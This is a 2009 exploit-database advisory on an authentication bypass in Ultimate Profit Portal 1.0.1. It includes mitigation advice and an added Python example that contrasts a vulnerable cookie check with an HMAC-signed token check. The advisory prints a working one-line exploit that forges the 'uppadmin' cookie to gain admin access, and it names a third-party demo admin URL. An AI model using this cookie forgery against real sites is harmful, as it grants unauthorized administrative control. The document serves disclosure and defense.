Vendor: Ultimate Profit Portal
By: TiGeR-Dz
CVSS: 7.5 (HIGH)
Vulnerability class: Insecure Cookie Handling
CWE: 614
Product Name: Ultimate Profit Portal
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:mrcgiguy:ultimate_profit_portal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2009

Ultimate Profit Portal Version 1.0.1 Insecure Cookie Handling Vulnerability

Ultimate Profit Portal Version 1.0.1 decides whether a visitor is an authenticated administrator from the value of a client-controlled cookie. Because the browser, not the server, controls that value, an attacker can set the uppadmin cookie to "logged in" and reach the admin panel without ever authenticating. The exploit code is javascript:document.cookie="uppadmin=logged%20in;path=/"; and a demo of the exploit can be found at http://www.myhotlinks.net/cgi-bin/directory/admin.cgi.

Mitigation:

Do not derive authentication state from a cookie value the client can choose. Keep the logged-in state on the server and let the cookie carry only an unguessable session identifier or a server-signed token that is verified on every request; validate every cookie before acting on it.
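The following is an added example written for this page, not code from Ultimate Profit Portal (which is a Perl CGI script): it models the vulnerable "trust the cookie" check the advisory describes beside a hardened check that accepts only a server-issued, HMAC-signed token with an expiry. The cookie name uppadmin comes from the advisory; the token format, the key and the helper names are assumptions of this example.

```python
import hashlib
import hmac
import secrets
import time
from http.cookies import SimpleCookie
from typing import Optional
from urllib.parse import unquote


def _cookies(header: str) -> dict:
    """Parse a raw Cookie request header into {name: value}, URL-decoding
    values the way a CGI cookie helper would (so logged%20in -> logged in)."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: unquote(morsel.value) for name, morsel in jar.items()}


def is_admin_vulnerable(cookie_header: str) -> bool:
    """Vulnerable pattern modelled on the advisory: the admin decision is
    nothing more than trusting a client-supplied cookie value."""
    return _cookies(cookie_header).get("uppadmin") == "logged in"


# Hardened pattern: the cookie carries a server-issued token "<expiry>.<hmac>"
# and the admin decision is made only after the HMAC verifies under a key the
# client never sees. SECRET_KEY is constructed per process for this example.
SECRET_KEY = secrets.token_bytes(32)


def issue_admin_token(ttl_seconds: int = 3600, now: Optional[float] = None,
                      key: bytes = SECRET_KEY) -> str:
    """Mint a token only after a real login succeeded; the expiry is signed."""
    expiry = int((time.time() if now is None else now) + ttl_seconds)
    sig = hmac.new(key, str(expiry).encode(), hashlib.sha256).hexdigest()
    return f"{expiry}.{sig}"


def is_admin_hardened(cookie_header: str, now: Optional[float] = None,
                      key: bytes = SECRET_KEY) -> bool:
    """Accept only an unexpired token whose HMAC verifies; anything else,
    including the forged value 'logged in', is rejected."""
    token = _cookies(cookie_header).get("uppadmin", "")
    expiry_str, sep, sig = token.partition(".")
    if not sep or not expiry_str.isdigit():
        return False  # malformed or forged: no server-issued structure at all
    expected = hmac.new(key, expiry_str.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected.encode(), sig.encode()):  # constant time
        return False
    current = time.time() if now is None else now
    return int(expiry_str) > current
```

A signed token like this cannot be revoked before it expires; a server-side session store keyed by a random identifier is the alternative when logout must take effect immediately.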

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
Ultimate Profit Portal Version 1.0.1 Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.mrcgiguy.com
Script:Ultimate Profit Portal Version 1.0.1
Download:http://www.mrcgiguy.com/ultimate_profit_portal.html
---------------------------------------------------------------
Exploit
-------
javascript:document.cookie="uppadmin=logged%20in;path=/";
----------------------------------------------------------------
Dem0
----
http://www.myhotlinks.net/cgi-bin/directory/admin.cgi
--------------------------------------

Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-14]